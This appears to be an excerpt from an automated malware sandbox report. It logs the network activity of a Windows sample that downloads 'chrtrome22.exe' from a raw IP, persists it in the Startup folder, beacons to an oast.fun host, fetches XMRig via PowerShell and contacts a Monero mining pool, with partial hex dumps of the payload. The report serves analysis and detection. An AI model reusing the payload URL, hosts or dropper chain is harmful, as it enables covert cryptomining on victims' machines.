Jan 8, 2025 11:42:53.368557930 CET	49735	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:43:03.252357960 CET	443	49746	141.94.96.144	192.168.2.4
Jan 8, 2025 11:43:03.273360014 CET	443	49735	141.94.96.144	192.168.2.4
Jan 8, 2025 11:43:03.306020975 CET	49746	443	192.168.2.4	141.94.96.144
Jan 8, 2025 11:43:03.352914095 CET	49735	443	192.168.2.4	141.94.96.144

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 11:41:00.084892988 CET	53862	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:41:00.270256042 CET	53	53862	1.1.1.1	192.168.2.4
Jan 8, 2025 11:41:01.826663971 CET	62495	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:41:01.833736897 CET	53	62495	1.1.1.1	192.168.2.4
Jan 8, 2025 11:41:03.027067900 CET	60387	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:41:03.034116983 CET	53	60387	1.1.1.1	192.168.2.4
Jan 8, 2025 11:41:06.265697956 CET	55192	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:41:06.397767067 CET	53	55192	1.1.1.1	192.168.2.4
Jan 8, 2025 11:41:07.183648109 CET	51647	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:41:07.368488073 CET	53	51647	1.1.1.1	192.168.2.4
Jan 8, 2025 11:41:09.408405066 CET	51606	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:41:09.415880919 CET	53	51606	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Type
Jan 8, 2025 11:41:00.298095942 CET	192.168.2.4	206.189.156.69	4d5a	Echo
Jan 8, 2025 11:41:00.560973883 CET	206.189.156.69	192.168.2.4	555a	Echo Reply
Jan 8, 2025 11:41:01.306375980 CET	192.168.2.4	206.189.156.69	4d59	Echo
Jan 8, 2025 11:41:01.569349051 CET	206.189.156.69	192.168.2.4	5559	Echo Reply
Jan 8, 2025 11:41:02.322062969 CET	192.168.2.4	206.189.156.69	4d58	Echo
Jan 8, 2025 11:41:02.585097075 CET	206.189.156.69	192.168.2.4	5558	Echo Reply
Jan 8, 2025 11:41:03.352897882 CET	192.168.2.4	206.189.156.69	4d57	Echo
Jan 8, 2025 11:41:03.617453098 CET	206.189.156.69	192.168.2.4	5557	Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 11:41:00.084892988 CET	192.168.2.4	1.1.1.1	0xbb6f	Standard query (0)	wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:01.826663971 CET	192.168.2.4	1.1.1.1	0xfb8f	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:03.027067900 CET	192.168.2.4	1.1.1.1	0xa65	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:06.265697956 CET	192.168.2.4	1.1.1.1	0x4684	Standard query (0)	evilbit.pro	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:07.183648109 CET	192.168.2.4	1.1.1.1	0x6910	Standard query (0)	wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:09.408405066 CET	192.168.2.4	1.1.1.1	0xf7d6	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 11:41:00.270256042 CET	1.1.1.1	192.168.2.4	0xbb6f	No error (0)	wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun		206.189.156.69	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:01.833736897 CET	1.1.1.1	192.168.2.4	0xfb8f	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:03.034116983 CET	1.1.1.1	192.168.2.4	0xa65	No error (0)	objects.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:03.034116983 CET	1.1.1.1	192.168.2.4	0xa65	No error (0)	objects.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:03.034116983 CET	1.1.1.1	192.168.2.4	0xa65	No error (0)	objects.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:03.034116983 CET	1.1.1.1	192.168.2.4	0xa65	No error (0)	objects.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:06.397767067 CET	1.1.1.1	192.168.2.4	0x4684	No error (0)	evilbit.pro		104.21.95.99	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:06.397767067 CET	1.1.1.1	192.168.2.4	0x4684	No error (0)	evilbit.pro		172.67.144.26	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:07.368488073 CET	1.1.1.1	192.168.2.4	0x6910	No error (0)	wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun		206.189.156.69	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:09.415880919 CET	1.1.1.1	192.168.2.4	0xf7d6	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 11:41:09.415880919 CET	1.1.1.1	192.168.2.4	0xf7d6	No error (0)	pool-fr.supportxmr.com		141.94.96.144	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:09.415880919 CET	1.1.1.1	192.168.2.4	0xf7d6	No error (0)	pool-fr.supportxmr.com		141.94.96.195	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:41:09.415880919 CET	1.1.1.1	192.168.2.4	0xf7d6	No error (0)	pool-fr.supportxmr.com		141.94.96.71	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

objects.githubusercontent.com

evilbit.pro

23.27.51.244

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	23.27.51.244	80	6744	C:\Users\user\Desktop\174.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 11:40:58.608191967 CET	102	OUT	GET /chrtrome22.exe HTTP/1.1 User-Agent: Mozilla/5.0 Host: 23.27.51.244 Cache-Control: no-cache
Jan 8, 2025 11:40:59.072829962 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:40:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sun, 05 Jan 2025 18:06:51 GMT ETag: "3400-62af96050fbc7" Accept-Ranges: bytes Content-Length: 13312 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be c9 7a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 18 00 00 00 1a 00 00 00 00 00 00 be 37 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 37 00 00 53 00 00 00 00 40 00 00 60 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELzg7 @@ @h7S@`` H.text `.rsrc`@@@.reloc`2@B7H<),8$0v(o(-((&(rposrpr!po,o(iYoo .oo+o(i1r7prOp(rWp(+<orap( ,(!o("(!Xi2&rp(-B=(o(-((&o#(! 0u($**(
Jan 8, 2025 11:40:59.072846889 CET	224	IN	Data Raw: 43 00 19 5c 00 0c 00 00 00 00 00 00 21 00 f6 17 01 03 01 00 00 01 00 00 1a 01 1c 36 01 3b 1d 00 00 01 1b 30 03 00 b1 00 00 00 02 00 00 11 28 25 00 00 0a 0a 04 28 12 00 00 0a 2d 08 04 28 26 00 00 0a 10 02 06 03 16 6f 27 00 00 0a 26 06 6f 28 00 00 Data Ascii: C\!6;0(%(-(&o'&o(o)oo++o,o-(!o.-,o-?o/+o0,o1o-(!o.-,o,
Jan 8, 2025 11:40:59.072859049 CET	1236	IN	Data Raw: 00 00 01 1c 00 00 02 00 3a 00 22 5c 00 0c 00 00 00 00 02 00 73 00 2b 9e 00 0c 00 00 00 00 13 30 04 00 26 00 00 00 03 00 00 11 20 00 10 00 00 8d 17 00 00 01 0a 2b 09 03 06 16 07 6f 32 00 00 0a 02 06 16 06 8e 69 6f 33 00 00 0a 25 0b 2d e8 2a 00 00 Data Ascii: :"\s+0& +o2io3%-0Z(4o5s6s7s8(,oo9(:,o,o(!**C:M0Z(;
Jan 8, 2025 11:40:59.072874069 CET	224	IN	Data Raw: 75 36 37 49 6f 72 52 48 70 48 4b 6e 4a 6b 52 61 4b 2b 31 4a 46 51 66 71 70 2b 48 33 70 55 33 49 38 61 44 78 48 67 61 4e 35 53 43 63 42 6f 6b 61 57 74 75 6f 6a 53 45 54 75 66 42 61 59 6f 77 73 69 49 59 67 7a 75 57 52 68 59 70 46 6e 34 64 68 6b 78 Data Ascii: u67IorRHpHKnJkRaK+1JFQfqp+H3pU3I8aDxHgaN5SCcBokaWtuojSETufBaYowsiIYgzuWRhYpFn4dhkxYZFG/6/W83kC0mASqhUy+7XXwA+0a4Pu7Ae5Y9PMx7oCybnLr5476KRjH6XrPaqXd6/O0fxc+U+PtSr3JsVPrsBh3ZAHopj1AMj9LC6TngFQElM0YeGjY7+x3Z1JsYweSDPTfhtne4vdc0
Jan 8, 2025 11:40:59.072886944 CET	1236	IN	Data Raw: 42 39 6b 4b 4f 50 37 4f 41 67 79 57 71 34 6d 4d 6e 63 49 59 68 77 52 4e 47 65 65 42 78 79 5a 4e 38 54 6f 73 38 38 6e 78 62 35 61 35 67 41 38 6e 33 73 36 55 76 4d 53 2f 75 2f 55 73 33 63 41 31 6d 43 53 30 78 71 34 4a 77 57 31 64 78 33 62 34 57 62 Data Ascii: B9kKOP7OAgyWq4mMncIYhwRNGeeBxyZN8Tos88nxb5a5gA8n3s6UvMS/u/Us3cA1mCS0xq4JwW1dx3b4Wbpr4fihvTj0Ly4XWZJYZyN/nJHghLC45SQqxMjzm3K0fa7203WxJwopGxNI0DIuO3uY19fkBkjGhC1MDJy4puX3gihtIgQ04jNEAfwwHNKfwH2UO/PPwYAAA==BSJBv4.0.30319lx
Jan 8, 2025 11:40:59.072899103 CET	1236	IN	Data Raw: 08 00 04 00 0d 00 08 00 08 00 12 00 0e 00 19 00 00 00 2e 00 0b 00 a9 01 2e 00 13 00 c1 01 2e 00 1b 00 d5 01 2e 00 23 00 db 01 2e 00 2b 00 ed 01 2e 00 33 00 0e 02 2e 00 3b 00 d5 01 2e 00 4b 00 d5 01 2e 00 53 00 36 02 2e 00 63 00 60 02 2e 00 6b 00 Data Ascii: ....#.+.3.;.K.S6.c`.km.sv8h%,M^&'/!<Module>iq33xp0h.ex
Jan 8, 2025 11:40:59.072915077 CET	448	IN	Data Raw: 6e 63 6f 64 69 6e 67 00 67 65 74 5f 41 53 43 49 49 00 47 65 74 53 74 72 69 6e 67 00 67 65 74 5f 43 68 61 72 73 00 53 75 62 73 74 72 69 6e 67 00 54 72 69 6d 00 4a 6f 69 6e 00 43 6f 6e 63 61 74 00 54 6f 4c 6f 77 65 72 00 6f 70 5f 45 71 75 61 6c 69 Data Ascii: ncodingget_ASCIIGetStringget_CharsSubstringTrimJoinConcatToLowerop_EqualityConsoleWriteLineInt32ToStringExceptionget_MessageSystem.ThreadingThreadSleepPowerShellCreatePathGetDirectoryNameAddScriptInvokePSDataStreamsge
Jan 8, 2025 11:40:59.072927952 CET	1236	IN	Data Raw: 6f 72 79 53 74 72 65 61 6d 00 53 79 73 74 65 6d 2e 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 00 47 5a 69 70 53 74 72 65 61 6d 00 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 00 54 6f 41 72 72 61 79 00 43 6f 6e 76 65 72 74 00 54 6f 42 61 73 65 36 Data Ascii: oryStreamSystem.IO.CompressionGZipStreamCompressionModeToArrayConvertToBase64StringFromBase64StringResources.resxResources.resxpsCode.ps1$args = @("","");/debug7\@
Jan 8, 2025 11:40:59.072941065 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 20 01 00 00 b0 44 00 00 a8 10 00 00 00 00 00 00 Data Ascii: DXU0A\|pU\|4VS_VERSION_INFO?DVarFil
Jan 8, 2025 11:40:59.072953939 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 8, 2025 11:40:59.078102112 CET	1236	IN	Data Raw: 4e ff fe 91 53 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d5 7a 45 80 e3 82 4a ff e4 82 4a ff e2 81 4a ff e0 80 49 ff de 7f 48 ff dc 7d 48 ff da 7c 47 ff d7 7b 46 ff d5 7a 45 ff d4 79 45 ff d1 77 44 ff cf 76 43 ff cd 75 43 ff Data Ascii: NS`zEJJJIH}H\|G{FzEyEwDvCuCtBsArAp@o?n?m>m>m>m>m>m>OyEpJKJJIH}G\|G{FzEyEwDvCuCtBsArAp@o?n?m>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	206.189.156.69	80	5808	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 11:41:07.375189066 CET	186	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682 Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun Connection: Keep-Alive
Jan 8, 2025 11:41:08.279041052 CET	366	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Content-Type, Authorization Access-Control-Allow-Origin: * Content-Type: text/html; charset=utf-8 Server: oast.fun X-Interactsh-Version: 1.2.2 Date: Wed, 08 Jan 2025 10:41:08 GMT Content-Length: 72 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 37 64 31 74 39 69 68 64 65 35 61 69 38 7a 6d 79 7a 70 61 77 75 73 63 79 6a 62 71 77 6f 6b 64 79 77 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head></head><body>7d1t9ihde5ai8zmyzpawuscyjbqwokdyw</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	206.189.156.69	80	5232	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 11:41:13.931591988 CET	186	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682 Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun Connection: Keep-Alive
Jan 8, 2025 11:41:14.846817970 CET	366	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Content-Type, Authorization Access-Control-Allow-Origin: * Content-Type: text/html; charset=utf-8 Server: oast.fun X-Interactsh-Version: 1.2.2 Date: Wed, 08 Jan 2025 10:41:14 GMT Content-Length: 72 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 37 64 31 74 39 69 68 64 65 35 61 69 38 7a 6d 79 7a 70 61 77 75 73 63 79 6a 62 71 77 6f 6b 64 79 77 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head></head><body>7d1t9ihde5ai8zmyzpawuscyjbqwokdyw</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	140.82.121.3	443	5808	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:41:02 UTC	219	OUT	GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682 Host: github.com Connection: Keep-Alive
2025-01-08 10:41:03 UTC	973	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 08 Jan 2025 10:41:02 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T104102Z&X-Amz-Expires=300&X-Amz-Signature=c3231b3fd9aefd44c30ccc55ac42d842573dc774aad7771dfb6f409d05444063&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-08 10:41:03 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	185.199.109.133	443	5808	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:41:03 UTC	658	OUT	GET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T104102Z&X-Amz-Expires=300&X-Amz-Signature=c3231b3fd9aefd44c30ccc55ac42d842573dc774aad7771dfb6f409d05444063&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2025-01-08 10:41:03 UTC	862	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2666251 Content-Type: application/octet-stream Last-Modified: Sun, 03 Nov 2024 07:56:35 GMT ETag: "0x8DCFBDD0A034A6E" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 4b93fb7f-701e-006d-20c0-4d551e000000 x-ms-version: 2024-11-04 x-ms-creation-time: Sun, 03 Nov 2024 07:56:35 GMT x-ms-blob-content-md5: V7erW859Xkf9Fo4fDUN9Mg== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=xmrig-6.22.2-msvc-win64.zip x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 830 Date: Wed, 08 Jan 2025 10:41:03 GMT X-Served-By: cache-iad-kcgs7200085-IAD, cache-ewr-kewr1740044-EWR X-Cache: HIT, HIT X-Cache-Hits: 7492, 0 X-Timer: S1736332864.572812,VS0,VE7
2025-01-08 10:41:03 UTC	1378	IN	Data Raw: 50 4b 03 04 14 00 00 00 00 00 31 75 63 59 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 50 4b 03 04 0a 00 00 00 00 00 1b 75 63 59 3d 16 f1 ff 3d 00 00 00 3d 00 00 00 1e 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 62 65 6e 63 68 6d 61 72 6b 5f 31 30 4d 2e 63 6d 64 40 65 63 68 6f 20 6f 66 66 0a 63 64 20 2f 64 20 22 25 7e 64 70 30 22 0a 78 6d 72 69 67 2e 65 78 65 20 2d 2d 62 65 6e 63 68 3d 31 30 4d 20 2d 2d 73 75 62 6d 69 74 0a 70 61 75 73 65 0a 50 4b 03 04 0a 00 00 00 00 00 1b 75 63 59 d3 c2 d1 ca 3c 00 00 00 3c 00 00 00 1d 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 62 65 6e 63 68 6d 61 72 6b 5f 31 4d 2e 63 6d 64 40 65 63 68 6f 20 6f 66 66 0a 63 64 20 2f 64 20 22 25 7e 64 70 30 22 0a 78 6d 72 69 67 2e 65 78 Data Ascii: PK1ucYxmrig-6.22.2/PKucY===xmrig-6.22.2/benchmark_10M.cmd@echo offcd /d "%~dp0"xmrig.exe --bench=10M --submitpausePKucY<<xmrig-6.22.2/benchmark_1M.cmd@echo offcd /d "%~dp0"xmrig.ex
2025-01-08 10:41:03 UTC	1378	IN	Data Raw: 2c bc 65 82 94 30 37 e4 6f 02 0f a4 b1 a9 05 8b f3 5a 59 04 b1 63 69 69 5f 2c 87 ce 3f 84 0d 5f 26 0c 3c 23 4c 6b de de 5f ed 27 61 f0 4d 9c a1 b8 99 1d a0 3b 88 2a b4 58 83 41 94 41 09 9b ba 50 92 59 5f 48 84 0b ae e5 6a 52 5b ce 21 b3 73 36 69 27 7e ab 5c 70 bc 3d 76 ed 21 8c 19 cd 31 28 bc af 5c da eb 35 81 b8 ef 85 77 09 8f 05 85 ee e9 58 d6 62 9d 15 44 6e 6b 01 d5 de b1 98 38 4d aa e0 38 08 2c b0 ac 5a 26 16 ed 59 e1 2c 34 ab 89 ad 92 98 a1 e1 59 97 6a 83 f2 5d 80 7b d0 c1 f4 6d f7 a2 74 c4 60 1e 0d 14 62 81 e0 da 68 8e e8 7a 95 58 33 1f 94 4a 2b d6 d6 ed 66 12 7a 12 f6 de ff 91 d5 87 bd ee 9b 0b c3 3f b1 7f ac d3 70 6e c2 2d 39 3a 41 99 ff a8 bf 0e fb e3 93 a3 d1 66 73 27 be e4 83 1a e9 e2 76 dc 1f df 3f cd fb 43 f4 8f 9b d1 d5 e6 c6 1f 7f 7a 1a 1c Data Ascii: ,e07oZYcii_,?_&<#Lk_'aM;*XAAPY_HjR[!s6i'~\p=v!1(\5wXbDnk8M8,Z&Y,4Yj]{mt`bhzX3J+fz?pn-9:Afs'v?Cz
2025-01-08 10:41:03 UTC	1378	IN	Data Raw: 66 a2 b1 45 51 48 69 a2 b4 d8 eb 2e 5b b5 60 2f 55 9c 43 d4 a6 8d 82 0e 21 48 44 9b fb 36 6e 6f 9f c9 63 ad 42 33 d7 88 ed 49 0a 0c 61 64 73 2f 5c f6 dc a5 dd 31 f7 65 ad 60 d1 c1 44 a3 c3 9a db 56 26 d7 84 c3 f1 fd 7c db 29 e5 7b 3e fc 05 50 4b 03 04 14 00 00 00 08 00 1b 75 63 59 ce 31 a4 ec fc 01 00 00 35 03 00 00 22 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 73 6f 6c 6f 5f 6d 69 6e 65 5f 65 78 61 6d 70 6c 65 2e 63 6d 64 6d 52 c1 72 da 30 10 3d 87 af d8 66 a6 d3 4b 70 a0 43 5a f0 64 72 08 50 4a 02 0d 43 6b 12 b8 64 84 b5 c6 0a b2 e4 58 72 01 1f fa ed 5d c9 21 49 67 3a a3 c3 6a f5 f6 e9 bd 27 85 21 0c f7 2c cb 25 c2 9a d9 38 85 44 50 99 e8 02 32 a1 84 da c0 54 2b 2c 34 18 2d 75 23 0c 69 c1 37 5d 64 cc ba f2 64 9f 15 62 13 e0 1e a1 a9 e1 52 69 8e c0 Data Ascii: fEQHi.[`/UC!HD6nocB3Iads/\1e`DV&\|){>PKucY15"xmrig-6.22.2/solo_mine_example.cmdmRr0=fKpCZdrPJCkdXr]!Ig:j'!,%8DP2T+,4-u#i7]ddbRi
2025-01-08 10:41:03 UTC	1378	IN	Data Raw: 30 37 98 98 b1 c9 80 c8 7a 43 64 65 d7 20 83 25 2d 80 e2 8d a0 7a 34 70 26 b1 e4 1e 00 e2 8d d0 62 c9 f5 1c 44 54 2c e5 2e 40 58 66 b2 84 da 9b be a6 f9 04 e3 26 b1 ad 72 60 72 84 fa ab 08 59 77 0d 3c 19 b6 cb 20 9c 69 be 58 f2 63 a0 6e 19 86 83 9e 47 d0 64 0e ba 0b 41 d3 00 ca a0 2f 4b 47 80 e3 b2 4c 04 98 2d 6b 45 3a 8b 12 8c 5b 18 02 04 e3 66 b1 94 08 30 14 a0 88 2c 07 59 0b 96 99 38 4b 42 2c b9 10 74 46 da 92 b3 01 82 8c 9e b2 0a 8c fe 92 89 1a 62 01 c6 bb 21 63 d0 65 4a 7e 25 96 e5 22 6e c7 6a 22 32 63 55 70 83 5f 00 7f e8 2d ea d7 8d a5 48 e3 ad 3f d1 e8 89 34 d6 72 1b 59 bc 6f 41 32 62 a2 88 6d fc 48 80 0d 5d e5 f0 ad 64 db 20 5e 08 8d 1a 1e 0c 7a 19 c4 44 0d f3 bc 48 43 59 30 f9 87 ca 50 c8 fc fd 90 49 fb 22 a8 05 07 7d 82 cc ff 52 01 b2 5a 7d c8 Data Ascii: 07zCde %-z4p&bDT,.@Xf&r`rYw< iXcnGdA/KGL-kE:[f0,Y8KB,tFb!ceJ~%"nj"2cUp_-H?4rYoA2bmH]d ^zDHCY0PI"}RZ}
